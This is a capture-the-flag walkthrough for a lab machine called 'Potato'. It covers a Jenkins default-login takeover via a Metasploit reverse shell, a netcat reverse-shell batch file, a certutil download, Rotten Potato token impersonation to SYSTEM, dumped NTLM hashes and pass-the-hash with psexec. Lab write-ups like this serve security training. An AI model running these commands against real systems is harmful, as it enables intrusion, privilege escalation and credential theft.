NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  Potato at  https://www.cyberseclabs.co.uk/labs/beginner-labs



sudo nmap -O -A -p-
kali@kali:~/cyberseclabs$ nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT
Nmap scan report for
Host is up (0.10s latency).
Not shown: 990 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds


We get a Jenkins login page  lets try some default credentials the good old admin:admin… 


Step 2: Exploitation

Browsing around the console and doing some clicking around, I have no idea what the hell I am looking for. I see a script console and this starts to stir up some evil thoughts on how I can exploit this thing. Did some googling and sure enough I found a Metasploit module that allows us to exploit this bad boy using Java code execution. This exploit can also be done manually without using Metasploit’s spoon feeding by throwing in commands to execute in the console.

Exploit: https://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console

Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:

use exploit/multi/http/jenkins_script_console
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin

by default this module  likes to use reverse_https payload for our reverse connection back. I switched to reverse_tcp for consistency.

set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777

Now it starts to exploit giving us back a meterpreter session. I typed the command shell for a detailed shell.

C:\Users\ben\Desktop>type access.txt
type access.txt

Step 3: Post Exploitation

I ran to see if this thing was vulnerable to the Juicy Potato exploit

C:\Users\ben\Desktop>whoami /priv
whoami /priv


Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


We can see that SeImpersonatePrivilege is Enabled. This means we can use the famous Juicy Potato attack.

I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.

We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:

We can now then load the Juicy Potato exploit module using the following commands:

use exploit/windows/local/ms16_075_reflection_juicy
set LHOST <your ip>

Sadly not working for me..

So We first transfer the juicy potato binary on our victim machine. You can get it from here. We also transfer nc.exe(Netcat for windows) to the victim machine.

c:\users\ben>certutil -urlcache -split -f nc.exe

Juicy Potato also requires CLSID as an argument. You can find the list of CLSID for your OS version on the github repo of Juicy Potato. Using the ‘systeminfo’ command we can see that the machine is running Windows server 2012.

Next, we create a batch file, having the following contents.

echo nc.exe -e cmd.exe 1337 > rev.bat

This simply means that when rev.bat is run, it will connect to our local machine using nc.exe .

Now, we use juicy potato. But before that let’s set up a netcat listener on our local machine.

Running Juicy potato now,

c:\puck\juicy.exe -p c:\Users\ben\rev.bat -t * -l 6666 -c {e60687f7–01a1–40aa-86ac-db1cbf673334}


  • -p : Program to launch

Once this is completed, we get a shell back on our machine as NT Authority\system.

again not for me

c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
Testing {e60687f701a140aa-86ac-db1cbf673334} 6666
COM -> recv failed with error: 10038

let’s go rotten

meterpreter > upload /tmp/rottenpotato.exe .
[*] uploading : /tmp/rottenpotato.exe -> .
[*] uploaded : /tmp/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc -f rottenpotato.exe
Process 952 created.
Channel 3 created.
meterpreter > execute -Hc -f rottenpotato.exe
Process 1952 created.
Channel 4 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 Volume in drive C has no label.
 Volume Serial Number is 7863-44CF

 Directory of c:\Users\Administrator\Desktop

05/16/2020  01:26 PM    <DIR>          .
05/16/2020  01:26 PM    <DIR>          ..
05/19/2020  11:54 AM                32 system.txt
               1 File(s)             32 bytes
               2 Dir(s)   8,087,158,784 bytes free

type system.txt
c:\Users\Administrator\Desktop>^Z Background channel 5? [y/N] y meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223::: ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
kali@kali:~/cyberseclabs$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 ad
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file fJyPgVRp.exe
[*] Opening SVCManager on
[*] Creating service srVS on
[*] Starting service srVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname &&whoami
nt authority\system


Author – Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *